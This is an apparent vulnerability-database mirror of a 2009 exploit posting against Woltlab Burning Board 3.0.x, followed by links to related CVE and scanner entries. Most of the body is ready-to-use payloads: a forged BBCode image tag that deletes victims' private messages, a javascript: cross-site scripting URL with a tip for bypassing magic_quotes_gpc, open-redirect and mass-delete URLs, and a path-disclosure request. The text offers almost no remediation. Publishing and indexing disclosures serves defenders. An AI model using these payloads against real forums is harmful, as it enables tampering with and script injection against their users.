Lucene search
StAkeREDB-ID:8183HistoryMar 09, 2009 - 12:00 a.m.
woltlab burning board 3.0.x - Multiple Vulnerabilities
2009-03-0900:00:00
StAkeR
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
+---------------------------------------------------------------------------+
| Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities |
+---------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| thanks to s3rg3770 |
+---------------------------------------------------------------------------+
# Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
# BBCode IMG Tag Script Injection
# [img]http://[host][/img]
# Delete Private Messages (BBCode IMG Tag Script Injection)
# Insert into a (forum message/private message/your signature) the code below:
# [img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
# The fake image doesn't show errors.
# Cross Site Scripting
# http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
# you can bypass the magic_quotes_gpc with String.FromCharCode function.
# URL Redirection
# http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
# http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
# Full Path Discloscure
# http://[host]/[path]/wbb/index.php?page=[]
# it works on < 3.0.8 version only.
# milw0rm.com [2009-03-09]Related
openvas
openvas
WoltLab Burning Board CSRF Vulnerability
2009-09-16 00:00:00
WoltLab Burning Board Cross-Site Request Forgery Vulnerability
2009-09-16 00:00:00
prion
prion
Cross site request forgery (csrf)
2009-09-09 19:30:00
cve
cve
CVE-2008-7192
2009-09-09 19:30:00
nvd
nvd
CVE-2008-7192
2009-09-09 19:30:00
cvelist
cvelist
CVE-2008-7192
2009-09-09 19:00:00